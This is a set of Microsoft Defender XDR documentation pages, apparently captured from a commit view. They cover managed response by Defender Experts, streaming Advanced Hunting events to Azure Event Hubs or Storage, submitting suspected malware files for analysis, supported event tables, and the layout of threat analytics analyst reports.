--
-To view the incidents our experts have investigated or are currently investigating, filter the incident queue in your Microsoft Defender portal using the _Defender Experts_ tag.
--
-<a name='how-to-use-managed-response-in-microsoft-365-defender'></a>
-
-### How to use managed response in Microsoft Defender XDR
-
-In the Microsoft Defender portal, an incident that requires your attention using managed response has the **Assigned to** field set to _Customer_ and a task card on top of the **Incidents** pane. Your designated incident contacts also receives a corresponding email notification with a link to the Defender portal to view the incident. [Learn more about notification contacts](get-started-xdr.md#tell-us-who-to-contact-for-important-matters).
-
-Select **View managed response** on the task card or on the top of the portal page (**Managed response** tab) to open a flyout panel where you can read our experts' investigation summary, complete pending actions identified by our experts, or engage with them through chat.
-
-#### Investigation summary
-
-The **Investigation summary** section provides you with more context about the incident analyzed by our experts to provide you with visibility about its severity and potential impact if not addressed immediately. It could include the device timeline, indicators of attack, and indicators of compromise (IOCs) observed, and other details.
--
-#### Actions
-
-The **Actions** tab displays task cards that contain response actions recommended by our experts.
-
-Defender Experts for XDR currently supports the following one-click managed response actions:
-
-|**Action**|**Description**|
-||--|
-|[Isolate device](/microsoft-365/security/defender-endpoint/respond-machine-alerts##isolate-devices-from-the-network)|Isolates a device, which helps prevent an attacker from controlling it and performing further activities such as data exfiltration and lateral movement. The isolated device will still be connected to Microsoft Defender for Endpoint.|
-|[Quarantine file](/microsoft-365/security/defender-endpoint/respond-file-alerts##stop-and-quarantine-files)|Stops running processes, quarantines the files, and deletes persistent data such as registry keys.|
-|[Restrict app execution](/microsoft-365/security/defender-endpoint/respond-machine-alerts##restrict-app-execution)| Restricts the execution of potentially malicious programs and locks down the device to prevent further attempts.|
-|[Release from isolation](/microsoft-365/security/defender-endpoint/respond-machine-alerts#isolate-devices-from-the-network)| Undoes isolation of a device.|
-|[Remove app restriction](/microsoft-365/security/defender-endpoint/respond-machine-alerts#restrict-app-execution)| Undoes release from isolation.|
-
-Apart from these one-click actions, you can also receive managed responses from our experts that you need to perform manually.
-
-> [!NOTE]
-> Before performing any of the recommended managed response actions, make sure that they are not already being addressed by your automated investigation and response configurations. [Learn more about automated investigation and response capabilities in Microsoft Defender XDR](m365d-autoir.md).
-
-**To view and perform the managed response actions:**
-
-1. Select the arrow buttons in an action card to expand it and read more information about the required action.
-
- :::image type="content" source="../../media/xdr/action-card-1.png" alt-text="Screenshot of managed response action to isolate the device prod server." lightbox="../../media/xdr/action-card-1.png":::
-
-2. For cards with one-click response actions, select the required action. The **Action status** in the card changes to **In progress**, then to **Failed** or **Completed**, depending on the action's outcome.
-
- :::image type="content" source="../../media/xdr/action-card-2.png" alt-text="Screenshot of managed response action showing in-progress to isolate the device prod server." lightbox="../../media/xdr/action-card-2.png":::
-
- > [!TIP]
- > You can also monitor the status of in-portal response actions in the [Action center](m365d-action-center.md). If a response action fails, try doing it again from the **View device details** page or [initiate a chat](communicate-defender-experts-xdr.md#in-portal-chat) with Defender Experts.
-
-3. For cards with required actions that you need to perform manually, select **I've completed this action** once you've performed them, then select **Yes, I've done it** in the confirmation dialog box that appears.
-
- :::image type="content" source="../../media/xdr/ive-completed-this-action.png" alt-text="Screenshot of managed response action to confirm action completion." lightbox="../../media/xdr/ive-completed-this-action.png":::
-
-4. If you don't want to complete a required action right away, select **Skip**, then select **Yes, skip this action** in the confirmation dialog box that appears.
-
-> [!IMPORTANT]
->
->If you notice that any of the buttons on the action cards are grayed out, it could indicate that you don't have the necessary permissions to perform the action. Make sure that you're signed into the Microsoft Defender XDR portal with the appropriate permissions. Most managed response actions require that you have at least the Security Operator access.
->
->If you still encounter this issue even with the appropriate permissions, navigate to **View device details** and complete the steps from there.
--
-## Get visibility to Defender Experts investigations in your SIEM or ITSM application
-
-As Defender Experts for XDR investigate incidents and come up with remediation actions, you can have visibility to their work on incidents in your security information and event management (SIEM) and IT service management (ITSM) applications, including applications that are available out of the box.
-
-### Microsoft Sentinel
-
-You can get incident visibility in Microsoft Sentinel by turning on its out-of-the-box Microsoft Defender XDR data connector. [Learn more](/azure/sentinel/connect-microsoft-365-defender).
-
-Once you have turned on the connector, updates by Defender Experts to the **Status**, **Assigned to**, **Classification**, and **Determination** fields in Microsoft Defender XDR will show up in the corresponding **Status**, **Owner**, and **Reason for closing** fields in Sentinel.
-
-> [!NOTE]
-> The status of incidents investigated by Defender Experts in Microsoft Defender XDR typically transitions from _Active_ to _In progress_ to _Awaiting Customer Action_ to _Resolved_, while in Sentinel, it follows the _New_ to _Active_ to _Resolved_ path. The Microsoft Defender XDR Status _**Awaiting Customer Action**_ doesn't have an equivalent field in Sentinel; instead, it's displayed as a tag in an incident in Sentinel.
-
-The following section describes how an incident handled by our experts is updated in Sentinel as it progresses through the investigation journey:
-
-1. An incident being investigated by our experts has the **Status** listed as _Active_ and the **Owner** listed as _Defender Experts_.
-1. An incident that our experts have confirmed as a _True Positive_ has a managed response posted in Microsoft Defender XDR, and a **Tag** _Awaiting Customer Action_ and the **Owner** is listed as _Customer_. You need to act on the incident based on using the provided managed response.
-1. Once our experts have concluded their investigation and closed an incident as _False Positive_ or _Informational_, _Expected Activity_, the incident's **Status** is updated to _Resolved_, the **Owner** is updated to _Unassigned_, and a **Reason for closing** is provided.
--
-### Other applications
-
-You could obtain visibility into incidents in your SIEM or ITSM application by using the [Microsoft Defender XDR API](../defender/api-overview.md) or [connectors in Sentinel](/azure/sentinel/data-connectors-reference).
-
-After configuring a connector, the updates by Defender Experts to an incident's **Status**, **Assigned to**, **Classification**, and **Determination** fields in Microsoft Defender XDR can be synchronized with the third-party SIEM or ITSM applications, depending on how the field mapping has been implemented. To illustrate, you can take a look at the [connector available from Sentinel to ServiceNow](https://github.com/Azure/Azure-Sentinel/tree/master/Solutions/Servicenow/StoreApp).
-
-## Get real-time visibility with Defender Experts for XDR reports
-
-Defender Experts for XDR includes an interactive, on-demand report that provides a clear summary of the work our expert analysts are doing on your behalf, aggregate information about your incident landscape, and granular details about specific incidents. Your service delivery manager (SDM) also uses the report to provide you with more context regarding the service during a monthly business review.
--
-Each section of the report is designed to provide more insights about the incidents our experts investigated and resolved in your environment in real time. You can also select the **Date range** to get detailed information about incidents based on severity, category, and understand the time taken to investigate and resolve an incident during a specific period.
-
-### Understand the Defender Experts for XDR report
-
-The topmost section of the Defender Experts for XDR report provides the percentage of incidents we resolved in your environment, providing you with transparency in our operations. This percentage is derived from the following figures, which are also presented in the report:
--- **Investigated** ΓÇô The number of active threats and other incidents from your incident queue that we triaged, investigated, or currently investigating within our scope.-- **Resolved** ΓÇô The total number of investigated incidents that were closed.-- **Resolved directly** ΓÇô The number of investigated incidents that we were able to close directly on your behalf.-- **Resolved with your help** ΓÇô The number of investigated incidents that were resolved because of your action on one or more managed response tasks.-
-The **Average time to resolve incidents** section displays a bar chart of the average time, in minutes, our experts spent investigating and closing incidents in your environment and the average time you spent performing the required managed response actions.
-
-The **Incidents by severity**, **Incidents by category**, and **Incidents by service source** sections break down resolved incidents by severity, attack technique, and Microsoft security service source, respectively. These sections let you identify potential attack entry points and types of threats detected in your environment, assess their impact, and develop strategies to mitigate and prevent them. Select **View incidents** to get a filtered view of the incident queue based on the selections you made in each of the two sections.
-
-The **Most impacted assets** section shows the users and devices in your environment that were involved in the most number of incidents during your selected date range. You can see the volume of incidents each asset was involved in. Select an asset to get a filtered view of the incident queue based on the incidents that included the said asset.
-
-## Proactive managed hunting
-
-Defender Experts for XDR also includes proactive threat hunting offered by [Microsoft Defender Experts for Hunting](defender-experts-for-hunting.md). Defender Experts for Hunting was created for customers who have a robust security operations center but want Microsoft to help them proactively hunt threats using Microsoft Defender data. This proactive threat hunting service goes beyond the endpoint to hunt across endpoints, Office 365, cloud applications, and identity. Our experts investigate anything they find, then hand off the contextual alert information along with remediation instructions, so you can quickly respond.
-
-## Request advanced threat expertise on demand
-
-Select **Ask Defender Experts** directly inside the Microsoft Defender XDR portal to get swift and accurate responses to all your threat questions. Experts can provide insights to better understand the complex threats your organization might face. Consult an expert to:
--- Gather additional information on alerts and incidents, including root causes and scope.-- Gain clarity into suspicious devices, alerts, or incidents and get the next steps if faced with an advanced attacker.-- Determine risks and available protections related to activity groups, campaigns, or emerging attacker techniques.-
-> [!NOTE]
-> Ask Defender Experts is not a security incident response service. It's intended to provide a better understanding of complex threats affecting your organization. Engage with your own security incident response team to address urgent security incident response issues. If you don't have your own security incident response team and would like Microsoft's help, create a support request in the [Premier Services Hub](/services-hub/).
-
-The option to **Ask Defender Experts** is available in the incidents and alerts pages for you to ask contextual questions about a specific incident or alert:
--- _**Alerts page flyout menu**_:---- _**Incidents page actions menu**_:--
-### See also
--- [Search audit logs for actions performed by Defender Experts](auditing.md)-- [Additional information](additional-information-xdr.md)-- [General information on Defender Experts for XDR service](frequently-asked-questions.md)-
security Streaming Api Event Hub https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/streaming-api-event-hub.md
- Title: Stream Microsoft Defender XDR events to Azure Event Hubs
-description: Learn how to configure Microsoft Defender XDR to stream Advanced Hunting events to your Event Hubs.
-keywords: raw data export, streaming API, API, Azure Event Hubs, Azure storage, storage account, Advanced Hunting, raw data sharing
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
------ m365-security-- tier3-- Previously updated : 02/08/2023--
-# Configure Microsoft Defender XDR to stream Advanced Hunting events to your Azure Event Hub
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
--
-## Prerequisites
-
-Prior to configuring Microsoft Defender XDR to stream data to Event Hubs, ensure the following prerequisites are fulfilled:
-
-1. Create an Event Hubs (for information, see [Set up Event Hubs](configure-event-hub.md#set-up-event-hubs)).
-
-2. Creating an Event Hubs Namespace (for information, see [Set up Event Hubs namespace](configure-event-hub.md#set-up-event-hubs-namespace)).
-
-3. Add permissions to the entity who has the privileges of a **Contributor** so that this entity can export data to the Event Hubs. For more information on adding permissions, see [Add permissions](configure-event-hub.md#add-permissions)
-
-> [!NOTE]
-> The Streaming API can be integrated either via Event Hubs or Azure Storage Account.
-
-## Enable raw data streaming
-
-1. Log on to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> as a ***Global Administrator*** or ***Security Administrator***.
-
-2. Go to the [Streaming API settings page](https://sip.security.microsoft.com/settings/mtp_settings/raw_data_export).
-
-3. Click on **Add**.
-
-4. Choose a name for your new settings.
-
-5. Choose **Forward events to Azure Event Hub**.
-
-6. You can select if you want to export the event data to a single Event Hub, or to export each event table to a different Event Hubs in your Event Hubs namespace.
-
-7. To export the event data to a single Event Hub, enter your **Event Hub name** and your **Event Hub resource ID**.
-
- To get your **Event Hub resource ID**, go to your Azure Event Hubs namespace page on [Azure](https://ms.portal.azure.com/) > **Properties** tab > copy the text under **Resource ID**:
-
- :::image type="content" source="../defender-endpoint/media/event-hub-resource-id.png" alt-text="An Event Hub resource ID" lightbox="../defender-endpoint/media/event-hub-resource-id.png":::
-
-8. Go to the [Supported Microsoft Defender XDR event types in event streaming API](supported-event-types.md) to review the support status of event types in the Microsoft 365 Streaming API.
-
-9. Choose the events you want to stream and click **Save**.
-
-## The schema of the events in Azure Event Hub
-
-```JSON
-{
- "records": [
- {
- "time": "<The time Microsoft Defender XDR received the event>"
- "tenantId": "<The Id of the tenant that the event belongs to>"
- "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>"
- "properties": { <Microsoft Defender XDR Advanced Hunting event as Json> }
- }
- ...
- ]
-}
-```
--- Each Event Hubs message in Azure Event Hubs contains list of records.--- Each record contains the event name, the time Microsoft Defender XDR received the event, the tenant it belongs (you'll only get events from your tenant), and the event in JSON format in a property called "**properties**".--- For more information about the schema of Microsoft Defender XDR events, see [Advanced Hunting overview](advanced-hunting-overview.md).--- In Advanced Hunting, the **DeviceInfo** table has a column named **MachineGroup** which contains the group of the device. Here every event will be decorated with this column as well.-
-## Data types mapping
-
-To get the data types for event properties, do the following steps:
-
-1. Log on to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> and go to [Advanced Hunting page](https://security.microsoft.com/hunting-package).
-
-2. Run the following query to get the data types mapping for each event:
-
- ```kusto
- {EventType}
- | getschema
- | project ColumnName, ColumnType
- ```
--- Here's an example for Device Info event:-
- :::image type="content" source="../defender-endpoint/media/machine-info-datatype-example.png" alt-text="An example query for device info" lightbox="../defender-endpoint/media/machine-info-datatype-example.png":::
-
-## Estimating initial Event Hub capacity
-The following Advanced Hunting query can help provide a rough estimate of data volume throughput and initial event hub capacity based on events/sec and estimated MB/sec. We recommend running the query during regular business hours so as to capture 'real' throughput.
-
-```kusto
-let bytes_ = 500;
-union withsource=MDTables *
-| where Timestamp > startofday(ago(6h))
-| summarize count() by bin(Timestamp, 1m), MDTables
-| extend EPS = count_ /60
-| summarize avg(EPS), estimatedMBPerSec = (avg(EPS) * bytes_ ) / (1024*1024) by MDTables
-| sort by toint(estimatedMBPerSec) desc
-```
-
-## Monitoring created resources
-
-You can monitor the resources created by the streaming API using **Azure Monitor**.
-For more information, see [Log Analytics workspace data export in Azure Monitor](/azure/azure-monitor/logs/logs-data-export).
-
-## Related topics
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Overview of Advanced Hunting](advanced-hunting-overview.md)-- [Microsoft Defender XDR streaming API](streaming-api.md)-- [Supported Microsoft Defender XDR event types in event streaming API](supported-event-types.md)-- [Stream Microsoft Defender XDR events to your Azure storage account](streaming-api-storage.md)-- [Azure Event Hubs documentation](/azure/event-hubs/)-- [Troubleshoot connectivity issues - Azure Event Hubs](/azure/event-hubs/troubleshooting-guide)
security Streaming Api Storage https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/streaming-api-storage.md
- Title: Stream Microsoft Defender XDR events to your Storage account
-description: Learn how to configure Microsoft Defender XDR to stream Advanced Hunting events to your Storage account.
-keywords: raw data export, streaming API, API, Event Hubs, Azure storage, storage account, Advanced Hunting, raw data sharing
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
------ m365-security-- tier3-- Previously updated : 02/08/2023--
-# Configure Microsoft Defender XDR to stream Advanced Hunting events to your Storage account
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
--
-## Before you begin
-
-1. Create a [Storage account](/azure/storage/common/storage-account-overview) in your tenant.
-
-2. Log in to your [Azure tenant](https://ms.portal.azure.com/), go to **Subscriptions > Your subscription > Resource Providers > Register to Microsoft.Insights**.
-
-### Add contributor permissions
-
-Once the Storage account is created, you'll need to:
-
-1. Define the user who is logging into Microsoft Defender XDR as Contributor.
-
- Go to **Storage Account > Access control (IAM) > Add** and verify under **Role assignments**.
-
-## Enable raw data streaming
-
-1. Log in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> as a ***Global Administrator*** or ***Security Administrator***.
-
-2. Go to **Settings** \> **Microsoft Defender XDR** \> **Streaming API**. To go directly to the **Streaming API** page, use <https://security.microsoft.com/settings/mtp_settings/raw_data_export>.
-
-3. Select **Add**.
-
-4. In the **Add new Streaming API settings** flyout that appears, configure the following settings:
- 1. **Name**: Choose a name for your new settings.
- 2. Select **Forward events to Azure Storage**.
-4. To display the Azure Resource Manager resource ID for a storage account in the Azure portal, follow these steps:
-
- 1. Navigate to your storage account in the Azure portal.
- 2. On the **Overview** page, in the **Essentials** section, select the **JSON View** link.
- 3. The resource ID for the storage account is displayed at the top of the page, copy the text under **Storage Account Resource ID**.
-
- 4. Back on the **Add new Streaming API settings** flyout, choose the **Event types** that you want to stream.
-
- When you're finished, select **Submit**.
-
-## The schema of the events in the Storage account
--- A blob container is created for each event type:-
- :::image type="content" source="../defender-endpoint/media/storage-account-event-schema.png" alt-text="Example of a blob container" lightbox="../defender-endpoint/media/storage-account-event-schema.png":::
--- The schema of each row in a blob is the following JSON:-
- ```JSON
- {
- "time": "<The time Microsoft Defender XDR received the event>"
- "tenantId": "<Your tenant ID>"
- "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>"
- "properties": { <Microsoft Defender XDR Advanced Hunting event as Json> }
- }
- ```
--- Each blob contains multiple rows.--- Each row contains the event name, the time Defender for Endpoint received the event, the tenant it belongs (you'll only get events from your tenant), and the event in JSON format in a property called "properties".--- For more information about the schema of Microsoft Defender XDR events, see [Advanced Hunting overview](../defender/advanced-hunting-overview.md).-
-## Data types mapping
-
-In order to get the data types for our events properties do the following:
-
-1. Log in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> and go to **Hunting** \> **Advanced hunting**. To go directly to the **Advanced hunting** page, use <security.microsoft.com/advanced-hunting>.
-
-2. On the **Query** tab, run the following query to get the data types mapping for each event:
-
- ```text
- {EventType}
- | getschema
- | project ColumnName, ColumnType
- ```
--- Here's an example for Device Info event:-
- :::image type="content" source="../defender-endpoint/media/machine-info-datatype-example.png" alt-text="An example device info query" lightbox="../defender-endpoint/media/machine-info-datatype-example.png":::
-
-## Monitoring created resources
-
-You can monitor the resources created by the streaming API using **Azure Monitor**.
-For more information, see [Monitor destinations - Azure Monitor | Microsoft Docs](/azure/azure-monitor/logs/logs-data-export?tabs=portal#monitor-destinations).
-
-## Related topics
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Overview of Advanced Hunting](../defender/advanced-hunting-overview.md)-- [Microsoft Defender XDR Streaming API](streaming-api.md)-- [Stream Microsoft Defender XDR events to your Azure storage account](streaming-api-storage.md)-- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security Streaming Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/streaming-api.md
- Title: Stream Microsoft Defender XDR events
-description: Learn how to configure Microsoft Defender XDR to stream Advanced Hunting events to Event Hubs or Azure storage account
-keywords: raw data export, streaming API, API, Event hubs, Azure storage, storage account, Advanced Hunting, raw data sharing
------- m365-security-- tier3- Previously updated : 07/25/2023--
-# Streaming API
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview?view=graph-rest-1.0&preserve-view=true).
-> If you're using Microsoft Defender for Business, see [Use the streaming API (preview) with Microsoft Defender for Business](../defender-business/mdb-streaming-api.md).
--
-## Stream Advanced Hunting events to Event Hubs and/or Azure storage account.
-
-Microsoft Defender XDR supports streaming events through [Advanced Hunting](../defender/advanced-hunting-overview.md) to an [Event Hubs](/azure/event-hubs/) and/or [Azure storage account](/azure/event-hubs/).
-
-For more information on Microsoft Defender XDR streaming API, see the [video](https://www.microsoft.com/en-us/videoplayer/embed/RE4r4ga).
-
-## In this section
-
-Topic | Description
-:|:
-[Stream events to Azure Event Hubs](streaming-api-event-hub.md)| Learn about enabling the streaming API in your tenant and configure Microsoft Defender XDR to stream [Advanced Hunting](../defender/advanced-hunting-overview.md) to Event Hubs.
-[Stream events to your Azure storage account](streaming-api-storage.md)| Learn about enabling the streaming API in your tenant and configure Microsoft Defender XDR to stream [Advanced Hunting](advanced-hunting-overview.md) to your Azure storage account.
-[Supported event types](supported-event-types.md) | Learn which Advanced Hunting event types the Streaming API supports.
-
-Watch this short video to learn how to set up the streaming API to ship event information directly to Azure Event hubs for consumption by visualization services, data processing engines, or Azure storage for long-term data retention.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4r4ga]
-
-## Related topics
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Overview of Advanced Hunting](../defender/advanced-hunting-overview.md)-- [Azure Event Hubs documentation](/azure/event-hubs/)-- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security Submission Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/submission-guide.md
- Title: Submit files for analysis by Microsoft
-description: Learn how to submit files to Microsoft for malware analysis, how to track your submissions, and dispute detections.
-
-keywords: security, sample submission help, malware file, virus file, trojan file, submit, send to Microsoft, submit a sample, virus, trojan, worm, undetected, doesn't detect, email microsoft, email malware, I think this is malware, I think it's a virus, where can I send a virus, is this a virus, MSE, doesn't detect, no signature, no detection, suspect file, MMPC, Microsoft Malware Protection Center, researchers, analyst, WDSI, security intelligence
-
-ms.sitesec: library
------ m365-security-- tier2- Previously updated : 08/18/2023--
-# Submit files for analysis
-
-If you have a file that you suspect might be malware or is being incorrectly detected, you can submit it to us for analysis. This page has answers to some common questions about submitting a file for analysis.
-
-> [!TIP]
-> If your organization's subscription includes [Microsoft Defender for Endpoint Plan 2](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint), [Microsoft Defender for Office 365 Plan 2](/microsoft-365/security/office-365-security/defender-for-office-365), or [Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender), you can use the [new unified submissions portal](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unified-submissions-in-microsoft-365-defender-now-generally/ba-p/3270770). To learn more, see [Submit files in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/admin-submissions-mde).
-
-## How do I submit a file to Microsoft for analysis?
-
-### Send a malware file
-
-You can send files that you think might be malware or files that were incorrectly detected through the [sample submission portal](https://www.microsoft.com/wdsi/filesubmission).
-
-You can complete a quick analysis by providing detailed information about the product you were using and what you were doing when you found the file.
-
-After you sign in, you'll be able to track your submissions.
-
-> [!NOTE]
->
-> You can use the Microsoft Security Intelligence submission feature even if you don't have Microsoft Defender for Endpoint Plan 2 or Microsoft Defender for Office Plan 2.
-
-### Submit a suspected email attachment
-
-Use the [Microsoft Defender portal](https://security.microsoft.com/) to submit suspected email attachments to Microsoft for review. For more information, see [Submit a suspected email attachment to Microsoft](../office-365-security/submissions-admin.md).
-
-### Submit a file or file hash
-
-Use the unified submissions feature in Microsoft Defender for Endpoint to submit files and file hashes to Microsoft for review. For more information, see [Submit files in Microsoft Defender for Endpoint](../defender-endpoint/admin-submissions-mde.md).
-
-## Can I send a sample by email?
-
-No, we only accept submissions through our [sample submission portal](https://www.microsoft.com/wdsi/filesubmission).
-
-## Can I submit a sample without signing in?
-
-No. If you're an enterprise customer, you need to sign in so that we can prioritize your submission appropriately. If you're currently experiencing a virus outbreak or security-related incident, you should contact your designated Microsoft support professional or go to [Microsoft Support](https://support.microsoft.com/) for immediate assistance.
-
-## What is the Software Assurance ID (SAID)?
-
-The [Software Assurance ID (SAID)](https://www.microsoft.com/licensing/licensing-programs/software-assurance-default.aspx) is for enterprise customers to track support entitlements. The submission portal accepts and retains SAID information and allows customers with valid SAIDs to make higher priority submissions.
-
-### How do I dispute the detection of my program?
-
-[Submit the file](https://www.microsoft.com/wdsi/filesubmission) in question as a software developer. Wait until your submission has a final determination.
-
-If you're not satisfied with our determination of the submission, use the developer contact form provided with the submission results to reach Microsoft. We'll use the information you provide to investigate further if necessary.
-
-We encourage all software vendors and developers to read about [how Microsoft identifies malware and unwanted software](criteria.md).
-
-## How do I track or view past sample submissions?
-
-You can track your submissions through the [submission history page](https://www.microsoft.com/wdsi/submissionhistory).
-
-## What does the submission status mean?
-
-Each submission is shown to be in one of the following status types:
-
-* SubmittedΓÇöthe file has been received
-
-* In progressΓÇöan analyst has started checking the file
-
-* ClosedΓÇöa final determination has been given by an analyst
-
-You can see the status of any files you submit to us on the [submission history page](https://www.microsoft.com/wdsi/submissionhistory).
-
-## How does Microsoft prioritize submissions
-
-Processing submissions take dedicated analyst resource. Because we regularly receive a large number of submissions, we handle them based on a priority. The following factors affect how we prioritize submissions:
-
-* Prevalent files with the potential to impact large numbers of computers are prioritized.
-
-* Authenticated customers, especially enterprise customers with valid [Software Assurance IDs (SAIDs)](https://www.microsoft.com/licensing/licensing-programs/software-assurance-default.aspx), are given priority.
-
-* Submissions flagged as high priority by SAID holders are given immediate attention.
-
-Your submission is immediately scanned by our systems to give you the latest determination even before an analyst starts handling your case. Note that the same file may have already been processed by an analyst. To check for updates to the determination, select rescan on the submission details page.
-
-## See also
-
-[Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](../defender-endpoint/defender-endpoint-antivirus-exclusions.md)
security Supported Event Types https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/supported-event-types.md
- Title: Microsoft Defender XDR streaming event types supported in Event Streaming API
-description: Learn which streaming event types (tables) are supported by the streaming API
-keywords: raw data export, Streaming API, API, Event hubs, Azure storage, storage account, Hunting, raw data sharing
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
------ m365-security-- tier3- Previously updated : 09/09/2021--
-# Supported Microsoft Defender XDR streaming event types in event streaming API
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
---
-The Event Streaming API is constantly being expanded to support more event types. Learn which Hunting tables are generally available, currently in public preview, or not yet supported.
-
-**New - Identity and CloudApp event types/tables are now GA**.
-
-## Hunting tables support status in Event Streaming API
-
-The following table only includes the list of the tables supported in the streaming API, and is not inclusive of all AH schema. For a full list of the API see, [Learn the schema tables](advanced-hunting-schema-tables.md#learn-the-schema-tables).
-
-| Table name | Status<br>(Commercial) | GCC | GCC High | DoD |
-|-|-|-|-|-|
-| **[AlertEvidence](advanced-hunting-alertevidence-table.md)** | GA | GA | GA | GA |
-| **[AlertInfo](advanced-hunting-alertinfo-table.md)** | GA | GA | GA | GA |
-| **[DeviceEvents](advanced-hunting-deviceevents-table.md)** |GA | GA | GA | GA |
-| **[DeviceFileCertificateInfo](advanced-hunting-DeviceFileCertificateInfo-table.md)** |GA | GA | GA | GA |
-| **[DeviceFileEvents](advanced-hunting-devicefileevents-table.md)** | GA | GA | GA | GA |
-| **[DeviceImageLoadEvents](advanced-hunting-deviceimageloadevents-table.md)** | GA | GA | GA | GA |
-| **[DeviceInfo](advanced-hunting-deviceinfo-table.md)** | GA | GA | GA | GA |
-| **[DeviceLogonEvents](advanced-hunting-devicelogonevents-table.md)** | GA | GA | GA | GA |
-| **[DeviceNetworkEvents](advanced-hunting-devicenetworkevents-table.md)** |GA | GA | GA | GA |
-| **[DeviceNetworkInfo](advanced-hunting-devicenetworkinfo-table.md)** | GA | GA | GA | GA |
-| **[DeviceProcessEvents](advanced-hunting-deviceprocessevents-table.md)** | GA | GA | GA | GA |
-| **[DeviceRegistryEvents](advanced-hunting-deviceregistryevents-table.md)** | GA | GA | GA | GA |
-| **[EmailAttachmentInfo](advanced-hunting-emailattachmentinfo-table.md)** | GA |GA |GA |GA |
-| **[EmailEvents](advanced-hunting-emailevents-table.md)** | GA |GA |GA |GA |
-| **[EmailPostDeliveryEvents](advanced-hunting-emailpostdeliveryevents-table.md)** | GA |GA |GA |GA |
-| **[EmailUrlInfo](advanced-hunting-emailurlinfo-table.md)** | GA |GA |GA |GA |
-| **[IdentityLogonEvents](advanced-hunting-identitylogonevents-table.md)**|GA |GA |GA |GA |
-| **[IdentityQueryEvents](advanced-hunting-identityqueryevents-table.md)**|GA |GA |GA |GA |
-| **[IdentityDirectoryEvents](advanced-hunting-identitydirectoryevents-table.md)**|GA |GA |GA |GA |
-| **[CloudAppEvents](advanced-hunting-cloudappevents-table.md)**|GA |GA |GA |GA |
-| **[UrlClickEvents](advanced-hunting-urlclickevents-table.md)**|Public preview |Not available |Not available |Not available |
-
-## Related topics
-
-[Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)
security Threat Analytics Analyst Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/threat-analytics-analyst-reports.md
- Title: Understand the analyst report section in threat analytics in Microsoft Defender XDR-
-description: Learn about the analyst report section of each threat analytics report. Understand how it provides information about threats, mitigations, detections, advanced hunting queries, and more.
---- NOCSH------ m365-security-- tier1-- Previously updated : 02/16/2021--
-# Understand the analyst report in threat analytics in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR--
-Each [threat analytics report](threat-analytics.md) includes dynamic sections and a comprehensive written section called the _analyst report_. To access this section, open the report about the tracked threat and select the **Analyst report** tab.
--
-_Analyst report section of a threat analytics report_
-
-## Scan the analyst report
-
-Each section of the analyst report is designed to provide actionable information. While reports vary, most reports include the sections described in the following table.
-
-| Report section | Description |
-|--|--|
-| Executive summary | Overview of the threat, including when it was first seen, its motivations, notable events, major targets, and distinct tools and techniques. You can use this information to further assess how to prioritize the threat in the context of your industry, geographic location, and network. |
-| Analysis | Technical information about the threats, including the details of an attack and how attackers might utilize a new technique or attack surface |
-| MITRE ATT&CK techniques observed | How observed techniques map to the [MITRE ATT&CK attack framework](https://attack.mitre.org/) |
-| [Mitigations](#apply-additional-mitigations) | Recommendations that can stop or help reduce the impact of the threat. This section also includes mitigations that aren't tracked dynamically as part of the threat analytics report. |
-| [Detection details](#understand-how-each-threat-can-be-detected) | Specific and generic detections provided by Microsoft security solutions that can surface activity or components associated with the threat. |
